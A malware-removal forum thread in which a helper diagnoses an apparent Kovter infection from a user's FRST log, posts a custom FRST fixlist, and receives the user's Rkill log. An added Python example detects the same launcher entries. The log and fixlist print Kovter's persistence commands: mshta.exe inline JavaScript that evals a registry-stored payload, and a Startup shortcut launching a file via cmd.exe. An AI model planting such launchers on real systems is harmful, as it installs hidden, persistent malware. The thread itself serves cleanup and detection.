2016-08-04 13:36 - 2016-12-21 10:26 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00546096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2015-09-04 19:34 - 2015-09-04 19:34 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-12-22 21:49 - 2015-01-27 08:26 - 01905904 ____N () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2015-12-22 21:49 - 2012-11-25 20:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-12-22 21:49 - 2014-02-18 12:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
2016-12-15 09:21 - 2016-12-07 23:29 - 01829208 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
2016-12-15 09:21 - 2016-12-07 23:29 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
2016-12-15 22:12 - 2016-12-15 22:12 - 17833560 _____ () C:\Users\Owner\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.186\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\37065567.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\44097241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\70022230.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BsMain => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BsScanner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\37065567.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\44097241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\70022230.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BsMain => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BsScanner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BsUpdate => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Classes\75a29: "C:\Windows\system32\mshta.exe" "javascript:Dv6Ty="kpDGulS";W8f=new ActiveXObject("WScript.Shell");aCVk71="PBz2";D4kLn=W8f.RegRead("HKCU\\software\\bykshfet\\noce");A4M5Vb="HZmwr";eval(D4kLn);WFchl11xY="O5wuSTc";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\dell.com -> dell.com
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 18:34 - 2009-06-10 13:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.254.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{A543F10B-7594-41E4-BB78-74DD4CFEFAD0}] => D:\games\Steam.exe
FirewallRules: [{504E1E8F-1998-4A28-B535-816B582F3EF7}] => D:\games\Steam.exe
FirewallRules: [{537E98E5-CCC8-4EA6-A3DE-DE239833CEB9}] => D:\games\bin\steamwebhelper.exe
FirewallRules: [{27A13F94-FBF5-4304-8E9A-27C8F6377CAE}] => D:\games\bin\steamwebhelper.exe
FirewallRules: [{DF55312E-A87E-4636-9AEB-22CC4CCFCED8}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A598F13A-E577-4115-B96F-75DAADDCA32E}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DC82047C-F571-4D27-AE47-8E25AA709F8C}] => D:\games\steamapps\common\GoatSimulator\Binaries\Win32\GoatGame-Win32-Shipping.exe
FirewallRules: [{97F1E280-1F58-4036-8D3B-A4AB0AFDE07C}] => D:\games\steamapps\common\GoatSimulator\Binaries\Win32\GoatGame-Win32-Shipping.exe
FirewallRules: [{4336F6A7-BFB9-4856-AE41-9969159C373D}] => D:\games\steamapps\common\Ostrich Island\OstrichIsland.exe
FirewallRules: [{E3E49540-DA16-4843-B75D-9709FB44CEE9}] => D:\games\steamapps\common\Ostrich Island\OstrichIsland.exe
FirewallRules: [{B8000D5F-C3DC-463D-A5DE-01CCDB10685D}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{97499616-5698-43D4-B1F0-BC20871CD2D2}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{5BE8033D-6848-4D0F-B23F-F6914ACE3BF2}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{304386CC-06C8-4836-B0F5-5678DFED9F8E}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{5B04FA9C-9A62-471F-9BFF-CC5BC42E009D}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{FD172805-0AC1-4E21-B2AC-FE3602F0B65A}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1106F23D-44B2-447D-8DF2-D0A0E5637D22}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1F93974D-31E5-4699-BE57-C8FF207FA657}] => D:\games\steamapps\common\Dino D-Day\dinodday.exe
FirewallRules: [{DB8073E7-FBA9-486A-9BCA-13E3B5BFC64E}] => D:\games\steamapps\common\Dino D-Day\dinodday.exe
FirewallRules: [{AF4FD28D-EECE-42FD-A184-44C5AE397016}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{5DAA871E-4CE0-4FB2-863D-83DC31CA1402}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{82E3BF6E-DB47-4974-A63F-F880E93F9B57}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{63875D53-438A-4457-8643-5BC6ED626346}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{8A1060E2-36CD-424E-9320-E311EB56BE35}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{2ED9BF3A-D02D-4E47-9BCC-55A8AA11AA26}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{0D06A544-D362-47A6-B2D4-EEE52EF403FB}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{53406011-FA4B-4CBE-97D5-97483A8E0E10}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5B050F35-85EF-46DD-8FF1-33E6847C2206}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{837B45AC-549E-44FE-AD60-EBE4C5528D20}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{98EB06F7-102D-4163-8D4C-A7DA95FF8468}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{3A940815-874F-4B98-8ADD-8914CBE6FDBD}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{06543AA5-9AA0-4C9F-B015-165FFE1C7091}] => D:\games\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{41219093-1F3B-4F4C-9F25-1055F0D075CF}] => D:\games\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{B4AB56C1-ACE3-49B3-812B-9B328A5B41A4}] => D:\games\steamapps\common\Dead by Daylight Alpha Access\DeadByDaylight.exe
FirewallRules: [{F322558A-051F-411A-A513-080FDF36E289}] => D:\games\steamapps\common\Dead by Daylight Alpha Access\DeadByDaylight.exe
FirewallRules: [TCP Query User{F244CCA8-2669-4C85-A321-8B0D07B5380D}D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe
FirewallRules: [UDP Query User{207FEB91-B9A5-48B7-86A9-1B8C55CB59E8}D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe
FirewallRules: [{0B28010B-E6EB-4914-9602-14B85B47BD0A}] => D:\games\steamapps\common\OrcsMustDieUnchained\Dashboard\Bin\SpitfireDashboard.exe
FirewallRules: [{0B7D03F1-7CD7-49EA-8100-E067E1CBF775}] => D:\games\steamapps\common\OrcsMustDieUnchained\Dashboard\Bin\SpitfireDashboard.exe
FirewallRules: [{696C9629-827E-4155-955C-C1919A04FE08}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AF5ABC92-FB52-495A-ADCD-0366FF705885}] => D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{A86F1E41-8D1F-40A3-A741-326F0AEE90C7}] => D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{F972FF74-D54F-4C7F-9214-76ECCCEBA030}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{BD2FD94E-29B1-42E5-A756-691E367F12B9}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{2FEB6DCD-2A28-415D-9764-09C8BE698A12}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{73DC3B85-C79F-4B96-B005-DEC5AC0395C7}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{86505221-0E2B-4301-9D80-F6C2B536D2DF}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{2E9E731D-DD51-49DC-B01C-DFD123595AA3}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{DB98E247-2B23-4A52-86AE-1C2E17CFED31}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{4E3E9E73-8872-46B7-9E5F-05C0D08958D2}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{74E0CFD0-3E9A-425F-80F1-4307641B2819}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{EB73B562-EB9A-4B5D-AFDF-44D2C35FEA1C}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{9EABB9A8-1A38-4776-AF17-79DCB5A4EFBF}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{D173BC0F-9B67-4460-ABEC-8743D7190C0A}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{C46A0005-052C-4055-AA89-D74BA356E1B7}] => D:\games\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{27C5C39B-B9A3-4CE5-9C98-2D59F179B915}] => D:\games\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{92477BDF-B603-4B87-812A-AD3BEB137A50}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{90462001-694A-485A-B60D-BDA7B73B61EE}] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{E007AF0C-9BCA-4113-B752-BF0A93A5BFDC}] => D:\Program Files\iTunes\iTunes.exe
FirewallRules: [TCP Query User{B8E89F7A-3A7B-43B3-8F79-9676CCEB86F4}D:\heroes of the storm\versions\base49278\heroesofthestorm_x64.exe] => D:\heroes of the storm\versions\base49278\heroesofthestorm_x64.exe
FirewallRules: [UDP Query User{DAA4F2A4-5CF8-4C85-BE2B-F0FA488D2B58}D:\heroes of the storm\versions\base49278\heroesofthestorm_x64.exe] => D:\heroes of the storm\versions\base49278\heroesofthestorm_x64.exe
 
==================== Restore Points =========================
 
09-01-2017 02:16:39 Scheduled Checkpoint
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/10/2017 09:21:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2995
 
Error: (01/10/2017 09:21:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2995
 
Error: (01/10/2017 09:21:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/10/2017 09:21:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1997
 
Error: (01/10/2017 09:21:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1997
 
Error: (01/10/2017 09:21:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/10/2017 09:21:35 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998
 
Error: (01/10/2017 09:21:35 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998
 
Error: (01/10/2017 09:21:35 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/10/2017 08:56:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NvStreamUserAgent.exe, version: 7.1.2084.9592, time stamp: 0x57605c64
Faulting module name: ntdll.dll, version: 6.1.7601.23572, time stamp: 0x57fd0651
Exception code: 0xc0000005
Fault offset: 0x000000000004da56
Faulting process id: 0x1c24
Faulting application start time: 0x01d26b628b4c0db0
Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: c974b600-d755-11e6-a36a-c48e8ffd48f0
 
 
System errors:
=============
Error: (01/10/2017 09:21:39 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 08:56:24 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 08:31:08 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 08:05:54 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 07:40:38 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 07:15:08 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 06:49:54 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 06:24:37 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 05:59:24 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 05:34:08 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
 
CodeIntegrity:
===================================
  Date: 2016-10-19 19:50:59.497
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:46:47.045
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:38:23.578
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:36:25.888
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:27:18.727
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:26:15.009
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:25:57.388
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:23:04.654
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:18:47.014
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:17:43.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-6700K CPU @ 4.00GHz
Percentage of memory in use: 19%
Total physical RAM: 24514.78 MB
Available physical RAM: 19785.32 MB
Total Virtual: 49027.75 MB
Available Virtual: 42232.91 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:226.7 GB) (Free:78.64 GB) NTFS
Drive d: (DATAPART1) (Fixed) (Total:1863.01 GB) (Free:1644.87 GB) NTFS
Drive y: (RECOVERY) (Fixed) (Total:11.73 GB) (Free:3.17 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 1EAA813D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or Vista) (Size: 238.5 GB) (Disk ID: 567A488E)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=11.7 GB) - (Type=27)
Partition 3: (Not Active) - (Size=226.7 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#14 Bezukhov

Posted 13 January 2017 - 11:08 AM

Sorry for the wait.

Let's get to work.

I'm kind of curious about the state of your computer. A lot of pointers to a Kovter infection. Here are the symptoms:
  • There is a large amount of network traffic
  • Multiple dllhost.exe processes are running
  • Your computer will act sluggish and programs will take a long time to start up.
  • Pages may be blocked or unreachable while you are browsing the web.
  • Unusual disk activity.
  • CPU utilization is very high
  • Computer is running slowly as a result of these behaviors
So are you still experiencing these, or are they gone after all the tools you ran? I need to know if you're still infected, or if I'm just seeing the remnants of this infection. Either way, there are some steps I want to take.

Step 1

Please download Rkill by Grinler and save it to your desktop.
  • Link 1
  • Link 2
  • Double-click on the Rkill desktop icon to run the tool.
  • If using Vista/Windows7, right-click on it and Run As Administrator.
  • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
  • If not, delete the file, then download and use the one provided in Link 2.
  • If it does not work, repeat the process and attempt to use one of the remaining links until the tool runs.
  • If the tool does not run from any of the links provided, please let me know.
Do not reboot the computer, you will need to run the application again.

Step 2
  • Press the Windows key + R on your keyboard at the same time. Type in notepad and press Enter.
  • Please copy and paste the contents of the below code box into the open notepad and save it as fixlist.txt. Save it in the same place as FRST64.exe.
    Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

CreateRestorePoint:
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\385b6.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) -> "javascript:CKS2wI="jfeb5ohb";TB0=new ActiveXObject("WScript.Shell");u3zJmwRL="gDj1bM";cIhP8=TB0.RegRead("HKCU\\software\\bykshfet\\noce");G7E1Wrjo="YFJO";eval(cIhP8);C2tiiv4T="yYep6F6";"
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4d3bf.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /C start "" "C:\Users\Owner\AppData\Roaming\8f902\c6d2f.9a4d38"
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Classes\75a29: "C:\Windows\system32\mshta.exe" "javascript:Dv6Ty="kpDGulS";W8f=new ActiveXObject("WScript.Shell");aCVk71="PBz2";D4kLn=W8f.RegRead("HKCU\\software\\bykshfet\\noce");A4M5Vb="HZmwr";eval(D4kLn);WFchl11xY="O5wuSTc";" <===== ATTENTION
2016-06-23 13:01 - 2015-09-25 01:21 - 0016800 _____ () C:\Users\Owner\AppData\Local\Z@!-3b495312-f55f-45c0-9281-2cc59bf18a1b.tmp
2016-06-23 13:01 - 2015-09-25 01:21 - 0015776 _____ () C:\Users\Owner\AppData\Local\Z@S!-c8699736-af5a-499d-bcba-33543711ac5a.tmp
C:\Users\Owner\AppData\Local\c345b
  • Run FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run.
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run, please post it to your reply
So for your next reply please post:

1) Rkill.txt
2) Fixlog.txt
3) A report on how your computer is running.
To err is Human. To blame it on someone else is even more Human.
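
The entries targeted by the fixlist above share one pattern: mshta.exe is handed an inline script that reads a registry value and passes it to eval(). The Python below is an added example, not part of the original post and not FRST's own code; it scans FRST-style log lines for that pattern and reports which registry value holds the script body. The sample lines are copied from the log in this thread, and all function names are assumptions of the example.

```python
import ntpath
import re

# Sample input: three flagged entries and two benign entries, all copied from
# the FRST output posted in this thread (raw string, backslashes kept as logged).
SAMPLE_LOG = r'''
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\385b6.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) -> "javascript:CKS2wI="jfeb5ohb";TB0=new ActiveXObject("WScript.Shell");u3zJmwRL="gDj1bM";cIhP8=TB0.RegRead("HKCU\\software\\bykshfet\\noce");G7E1Wrjo="YFJO";eval(cIhP8);C2tiiv4T="yYep6F6";"
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4d3bf.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /C start "" "C:\Users\Owner\AppData\Roaming\8f902\c6d2f.9a4d38"
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Classes\75a29: "C:\Windows\system32\mshta.exe" "javascript:Dv6Ty="kpDGulS";W8f=new ActiveXObject("WScript.Shell");aCVk71="PBz2";D4kLn=W8f.RegRead("HKCU\\software\\bykshfet\\noce");A4M5Vb="HZmwr";eval(D4kLn);WFchl11xY="O5wuSTc";" <===== ATTENTION
IE trusted site: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\dell.com -> dell.com
FirewallRules: [{92477BDF-B603-4B87-812A-AD3BEB137A50}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
'''

# mshta.exe given a script URL instead of an .hta file.
MSHTA_INLINE = re.compile(r'mshta\.exe\b.*?(?:javascript|vbscript):', re.I)
# RegRead("HK..."): the launcher fetches its real body from the registry.
REGREAD = re.compile(r'RegRead\(\s*"([^"]+)"\s*\)', re.I)
EVAL = re.compile(r'\beval\s*\(', re.I)
# Startup-folder shortcut that hands a quoted file path to cmd.exe /C start.
STARTUP_CMD = re.compile(
    r'\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk\b.*cmd\.exe\b'
    r'.*?/C\s+start\b.*?"([^"]+)"\s*$', re.I)


def location_of(line):
    """Return the shortcut path or registry key that a log entry describes."""
    head = line.split(' -> ', 1)[0] if ' -> ' in line else line.split(': "', 1)[0]
    return re.sub(r'^ShortcutWithArgument:\s*', '', head).strip()


def scan(log_text):
    """Return one finding per log line that matches a launcher pattern."""
    findings = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        finding = {'location': location_of(line), 'reasons': [],
                   'payload': None, 'target': None}
        if MSHTA_INLINE.search(line):
            finding['reasons'].append('mshta.exe started with an inline script URL')
            read = REGREAD.search(line)
            if read and EVAL.search(line):
                # The log shows JavaScript-escaped backslashes; undo that, then
                # split key from value name (RegRead reads a named value unless
                # the path ends in a backslash).
                path = read.group(1).replace('\\\\', '\\')
                key, _, value = path.rpartition('\\')
                finding['payload'] = (key, value)
                finding['reasons'].append(
                    'script body is read from the registry and passed to eval()')
        started = STARTUP_CMD.search(line)
        if started:
            finding['target'] = started.group(1)
            ext = ntpath.splitext(started.group(1))[1] or '(no extension)'
            finding['reasons'].append(
                'Startup shortcut opens a %s file through cmd.exe /C start' % ext)
        if finding['reasons']:
            findings.append(finding)
    return findings


def payload_values(findings):
    """Distinct (key, value name) pairs that the launchers read and evaluate."""
    return sorted({f['payload'] for f in findings if f['payload']})


if __name__ == '__main__':
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f['location'])
        for reason in f['reasons']:
            print('    - ' + reason)
    for key, value in payload_values(results):
        print('Registry value holding the script body: %s -> %s' % (key, value))
```

Both mshta.exe launchers in the sample resolve to the same registry value, so that value belongs in the evidence collected alongside the shortcut and the Classes key.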

#15 RedArach


Posted 13 January 2017 - 07:01 PM

Rkill.txt

 

Rkill 2.8.4 by Lawrence Abrams (Grinler)
Copyright 2008-2017 BleepingComputer.com
More Information about Rkill can be found at this link:
 
Program started at: 01/13/2017 03:51:53 PM in x64 mode.
Windows Version: Windows 7 Professional Service Pack 1
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * No malware processes found to kill.
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * Windows Defender Disabled
 
   [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001
 
Checking Windows Service Integrity: 
 
 * Windows Defender (WinDefend) is not Running.
   Startup Type set to: Manual
 
 * TBS [Missing Service]
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * No issues found.
 
Program finished at: 01/13/2017 03:51:58 PM
Execution time: 0 hours(s), 0 minute(s), and 5 seconds(s)




